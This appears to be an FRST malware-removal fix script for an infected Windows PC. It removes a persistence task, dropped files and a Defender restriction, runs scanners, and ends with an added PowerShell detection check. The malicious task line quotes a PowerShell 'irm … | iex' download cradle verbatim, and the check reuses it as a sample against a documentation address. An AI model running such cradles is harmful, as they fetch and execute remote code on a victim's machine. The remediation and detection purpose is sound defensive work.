Start::
SystemRestore: On
CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
Task: {CE792EB2-ABEB-4AEB-B8D4-82B9D30D5C79} - System32\Tasks\InteractiveServices\MicrosoftWindowsDiagnosisCommandsWriteDiagTelemetryResourcesTask.CL-NCLS-1-5-21-1911753872-4082573132-1566520084-1001 => C:\Windows\System32\conhost.exe [1011712 2026-05-13] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell -NoProfile -ExecutionPolicy Bypass -Command "irm 135.181.23542/a | iex" <==== ATTENTION
2026-06-10 11:46 - 2026-01-06 17:26 - 000000000 ____D C:\Users\Victus\AppData\Roaming\RenPy
AlternateDataStreams: C:\Windows:CM_be7995bdfc8d8ab791fbfefa187c3875a89ccddaea42f3929155d8af0adee7c6 [26]
AlternateDataStreams: C:\Users\Victus\Downloads\EpicInstaller-19.0.0 (1).msi:MBAM.Zone.Identifier [494]
AlternateDataStreams: C:\Users\Victus\Downloads\gadwcleaner.exe:MBAM.Zone.Identifier [282]
AlternateDataStreams: C:\Users\Victus\AppData\Local\Temp:$DATA [16]
FirewallRules: [{43888A3B-283A-480C-9E95-98F7D14A709B}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{C6C5698D-00E6-456A-AEB9-BA61DF8F5A25}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [TCP Query User{D366C2F9-BED1-480C-AACD-28B7FB6B8A14}C:\riot games\riot client\riotclientelectron\riot client.exe] => (Allow) C:\riot games\riot client\riotclientelectron\riot client.exe => No File
FirewallRules: [UDP Query User{C6484CB9-C1A8-4014-98BF-939AE2E7B5DE}C:\riot games\riot client\riotclientelectron\riot client.exe] => (Allow) C:\riot games\riot client\riotclientelectron\riot client.exe => No File
FirewallRules: [{90E3E3BC-08FE-4A4A-BCD9-F51E2070CCFA}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls II Scholar of the First Sin\Game\DarkSoulsII.exe => No File
FirewallRules: [{A1FBAB7D-EC6B-4E8F-97D2-D5169DDB2E52}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dark Souls II Scholar of the First Sin\Game\DarkSoulsII.exe => No File
FirewallRules: [{78F77026-1962-422D-AEA2-41227B538D91}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DARK SOULS III\Game\DarkSoulsIII.exe => No File
FirewallRules: [{036153A7-041B-4028-B330-38EBDAA4ECA1}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\DARK SOULS III\Game\DarkSoulsIII.exe => No File
FirewallRules: [TCP Query User{2474BB46-5439-4460-AA84-974F0C71476D}C:\games\metaphor - refantazio\metaphor.exe] => (Block) C:\games\metaphor - refantazio\metaphor.exe => No File
FirewallRules: [UDP Query User{1D25B012-63D5-46A5-832D-393E35B1A1FB}C:\games\metaphor - refantazio\metaphor.exe] => (Block) C:\games\metaphor - refantazio\metaphor.exe => No File
FirewallRules: [TCP Query User{8649881D-FDD3-4495-923E-3F659D0381B2}C:\program files\kodi\kodi.exe] => (Allow) C:\program files\kodi\kodi.exe => No File
FirewallRules: [UDP Query User{0BF821E4-B843-4985-9725-87238AC9B0DD}C:\program files\kodi\kodi.exe] => (Allow) C:\program files\kodi\kodi.exe => No File
FirewallRules: [{2C5B6319-A246-4783-BE8B-DB04093866D8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Yume Nikki\yumenikki\RPG_RT.exe => No File
FirewallRules: [{F294BBD6-C08E-487A-B93F-597C78E2DFA2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Yume Nikki\yumenikki\RPG_RT.exe => No File
HKU\S-1-5-21-1911753872-4082573132-1566520084-1001\...\Run: [RiotClient] => C:\Riot Games\Riot Client\RiotClientServices.exe --launch-background-mode (No File)
HKU\S-1-5-21-1911753872-4082573132-1566520084-1001\...\MountPoints2: {24810604-50aa-11f0-9163-c0bfbee47f8b} - "G:\Autoplay.exe" -auto
HKU\S-1-5-21-1911753872-4082573132-1566520084-1001\...\MountPoints2: {24810671-50aa-11f0-9163-c0bfbee47f8b} - "F:\OInstall_x64.exe"
HKU\S-1-5-21-1911753872-4082573132-1566520084-1001\...\MountPoints2: {2481087f-50aa-11f0-9163-c0bfbee47f8b} - "E:\Autoplay.exe" -auto
Task: {19BB00A0-3574-48E1-AFCD-A82E7A42F583} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem148.0.7730.0{6577D887-8D62-466F-8B70-E4669178A52C} => "C:\Program Files (x86)\Google\GoogleUpdater\148.0.7730.0\updater.exe" --wake --system (No File)
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
S2 GoogleUpdaterInternalService148.0.7730.0; "C:\Program Files (x86)\Google\GoogleUpdater\148.0.7730.0\updater.exe" --system --windows-service --service=update-internal (No File)
S2 GoogleUpdaterService148.0.7730.0; "C:\Program Files (x86)\Google\GoogleUpdater\148.0.7730.0\updater.exe" --system --windows-service --service=update (No File)
2025-09-11 15:55 - 2025-09-11 15:55 - 000000048 ____R () C:\Users\Victus\AppData\Local\80474006DEFACDB95D78F08DED6DE975
Folder: C:\WINDOWS\system32\Tasks\InteractiveServices
Folder: C:\Users\Victus\AppData\Roaming\KernelComponent_v3_0
Folder: C:\ProgramData\KernelComponent_v3_0
File: C:\Users\Victus\AppData\Local\CVault.exe
2026-06-10 11:47 - 2026-06-10 21:53 - 000000000 ____D C:\WINDOWS\system32\Tasks\InteractiveServices
2026-06-10 11:46 - 2026-06-10 11:46 - 001776016 _____ (AdRem Software Inc.) C:\Users\Victus\AppData\Local\CVault.exe
2026-06-10 11:46 - 2026-06-10 11:46 - 000000000 ____D C:\Users\Victus\AppData\Roaming\KernelComponent_v3_0
2026-06-10 11:46 - 2026-06-10 11:46 - 000000000 ____D C:\ProgramData\KernelComponent_v3_0
File: C:\Users\Victus\AppData\Roaming\Ground.exe
Startup: C:\Users\Victus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ground.lnk [2026-06-10]
ShortcutTarget: Ground.lnk -> C:\Users\Victus\AppData\Roaming\Ground.exe () [File not signed]
2026-04-29 15:24 - 2026-04-29 15:24 - 000534016 ___SH () C:\Users\Victus\AppData\Roaming\Ground.exe
HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [0 2025-10-30] () <==== ATTENTION [zero byte File/Folder]
FirewallRules: [{08C4DED5-0E9B-4673-B40B-28C3B773A199}] => (Allow) C:\Program Files (x86)\Microsoft\Copilot\Application\mscopilot.exe () <==== ATTENTION [zero byte File/Folder]
HKU\S-1-5-21-1911753872-4082573132-1566520084-1001\...\Policies\Explorer: []
File: C:\WINDOWS\system32\Drivers\BuHt.winsecurity
2026-06-08 04:46 - 2025-06-24 07:18 - 000003486 _____ C:\WINDOWS\system32\Tasks\MAkF7mCn3tPqp662daybvERzwsKQYqnzM8{3CBBF4EB-841F-45F2-A11E-95871801B61F}
Powershell: Get-ScheduledTask | select -first 30 | Get-ScheduledTaskInfo
Powershell: @("$env:APPDATA","$env:LOCALAPPDATA") | ForEach-Object { Get-ChildItem $_ -Recurse -Filter "index.js" -ErrorAction SilentlyContinue } | Where-Object { $_.FullName -match "discord_desktop_core" } | ForEach-Object { Write-Host "--- $($_.FullName) ---"; $c = Get-Content $_.FullName -Raw; $c.Substring(0,[Math]::Min(2000,$c.Length)) }
Powershell: (Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -ErrorAction SilentlyContinue).PSObject.Properties | Where-Object { $_.Name -match "^[a-z]$" } | ForEach-Object { Write-Host "$($_.Name): $($_.Value)" }
C:\WINDOWS\Temp\*
C:\WINDOWS\SystemTemp\*
C:\Users\Victus\AppData\Local\Temp\*
StartBatch:
rem This snippet downloads KVRT (Kaspersky Virus Removal Tool) directly from Kaspersky and scans with it.
rem IMPORTANT: This currently (to my knowledge) scans only the following: system memory, startup objects, boot sectors.
rem To perform a full scan (which may take longer than an hour, so it is not recommended), use the argument "-allvolumes".
rem It is better to keep it only as a scanner because cleaning modes tend to restart, which breaks the fix process.
%windir%\System32\curl.exe --silent "https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe" -o "C:\FRST\KASVRT.exe"
C:\FRST\KASVRT.exe -silent -adinsilent -accepteula -processlevel 0 -dontencrypt >> "C:\FRST\KVRT_log.txt"
type "C:\FRST\KVRT_log.txt"
exit
EndBatch:
StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from Emsisoft's official site, updates it and scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUPs in 1) system memory 2) important folders, as the documentation says.
# It will scan inside compressed archives, mail archives and NTFS alternate data streams, and use cloud requests.
# ---
# You can use the argument "/delete" to delete found objects including references, but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan, but that may take longer than what FRST can handle.
# You can use the argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer verifying the detections first.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath)) { New-Item -Path $frstPath -ItemType Directory -Force | Out-Null }
if (-not (Test-Path $extractPath)) { New-Item -Path $extractPath -ItemType Directory -Force | Out-Null }
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
if ([Environment]::Is64BitOperatingSystem) { $a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe" } else { $a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe" }
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
# Wait (bounded, so a failed download or extraction cannot hang the fix) for the scanner binary to appear,
# then give the extractor time to finish on its own before forcing it closed: stopping it the moment
# a2cmd.exe shows up can leave the rest of the kit half-written.
$waited = 0
while (-not (Test-Path $a2cmdPath) -and $waited -lt 600) { Start-Sleep -Seconds 1; $waited++ }
if (-not $proc.WaitForExit(120000)) { Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue }
if (-not (Test-Path $a2cmdPath)) { Write-Output "EEK extraction failed: $a2cmdPath not found"; exit 1 }
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:
StartPowerShell:
# Replace /scanonly with /clean if you also want to delete items; however, this will activate a trial license on the system, so I do not recommend it.
$hmpExe = "$env:TEMP\HitmanPro_x64.exe"
$logFile = "$env:TEMP\HitmanPro_ScanLog.txt"
Invoke-WebRequest -Uri "https://dl.surfright.nl/HitmanPro_x64.exe" -OutFile $hmpExe -UseBasicParsing
$proc = Start-Process $hmpExe -ArgumentList "/ews","/scanonly","/noinstall","/log=`"$logFile`"","/logtype=txt" -Wait -PassThru
if (!(Test-Path $logFile)) { Write-Host "Scan failed (exit $($proc.ExitCode))"; exit 1 }
Get-Content $logFile -Encoding Unicode
EndPowerShell:
CMD: DISM /Online /Cleanup-Image /RestoreHealth
CMD: sfc /scannow
CMD: findstr /c:"[SR]" %windir%\logs\cbs\cbs.log >> "%userprofile%\desktop\sfcdetails.txt"
CMD: type "%userprofile%\desktop\sfcdetails.txt"
CMD: del %temp%\*.* /f /s /q
CMD: rd /s /q %temp%
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
EmptyTemp:
End::
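Added example, not part of the fix above and not FRST output: a small PowerShell check to run after the fix has completed. It flags scheduled-task actions that follow the persistence pattern in this log (conhost.exe --headless proxying a PowerShell download cradle with -ExecutionPolicy Bypass and "irm ... | iex"), first against constructed sample actions and then against every registered task, and then re-tests the dropped files and folders the fix removes. The sample cradle uses the documentation address 192.0.2.10 rather than the address from the log, the artefact paths are the ones in the fix expressed through the Victus profile's environment variables, and Get-ScheduledTask needs an elevated PowerShell 3.0+ session to see every task.

```powershell
# Added post-fix check (hypothetical helper, not part of the FRST fix).
# Returns the reasons a task action looks like the conhost --headless / irm|iex
# persistence seen in this log; an empty result means nothing matched.
function Test-SuspiciousTaskAction {
    param([string]$Execute, [string]$Arguments)
    $cmd = "$Execute $Arguments"
    $reasons = @()
    if ($Execute -match '(?i)(^|\\)conhost\.exe$' -and $Arguments -match '--headless') {
        $reasons += 'conhost.exe --headless used as a launcher proxy'
    }
    if ($cmd -match '(?i)-(ExecutionPolicy|ep)\s+Bypass') { $reasons += 'ExecutionPolicy Bypass' }
    if ($cmd -match '(?i)\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b[^|]*\|\s*(iex|Invoke-Expression)\b') {
        $reasons += 'download cradle piped to Invoke-Expression'
    }
    if ($cmd -match '(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}') { $reasons += 'encoded command' }
    return $reasons
}

# Constructed sample actions: the first mirrors the malicious task in the log (address replaced
# with the documentation range 192.0.2.0/24), the other two are the benign tasks from the same log.
$samples = @(
    @{ Execute = 'C:\Windows\System32\conhost.exe'
       Arguments = '--headless powershell -NoProfile -ExecutionPolicy Bypass -Command "irm 192.0.2.10/a | iex"' },
    @{ Execute = '%systemroot%\system32\MusNotification.exe'; Arguments = '' },
    @{ Execute = '"C:\Program Files (x86)\Google\GoogleUpdater\148.0.7730.0\updater.exe"'; Arguments = '--wake --system' }
)
foreach ($s in $samples) {
    $r = @(Test-SuspiciousTaskAction -Execute $s.Execute -Arguments $s.Arguments)
    if ($r.Count) { "SUSPICIOUS sample: $($s.Execute) $($s.Arguments)`n  -> $($r -join '; ')" }
    else          { "ok sample: $($s.Execute)" }
}

# Live sweep: apply the same test to every action of every registered task.
Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
    $task = $_
    foreach ($a in $task.Actions) {
        if (-not $a.Execute) { continue }   # skip COM-handler / e-mail actions, which have no Execute
        $r = @(Test-SuspiciousTaskAction -Execute $a.Execute -Arguments ([string]$a.Arguments))
        if ($r.Count) { "SUSPICIOUS task $($task.TaskPath)$($task.TaskName): $($a.Execute) $($a.Arguments)`n  -> $($r -join '; ')" }
    }
}

# Artefacts the fix removes; each should report "gone" once the fix has run.
$artifacts = @(
    "$env:WINDIR\System32\Tasks\InteractiveServices",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\Ground.lnk",
    "$env:APPDATA\Ground.exe",
    "$env:LOCALAPPDATA\CVault.exe",
    "$env:APPDATA\KernelComponent_v3_0",
    "$env:ProgramData\KernelComponent_v3_0",
    "$env:WINDIR\System32\Drivers\BuHt.winsecurity"
)
foreach ($p in $artifacts) {
    $state = if (Test-Path $p) { 'PRESENT' } else { 'gone' }
    "{0,-8} {1}" -f $state, $p
}
```

Run it from an elevated PowerShell in the Victus session so $env:APPDATA and $env:LOCALAPPDATA resolve to that profile; a PRESENT line or a SUSPICIOUS task line after the fix means the persistence was recreated and the machine needs another look before the scanners' logs are trusted.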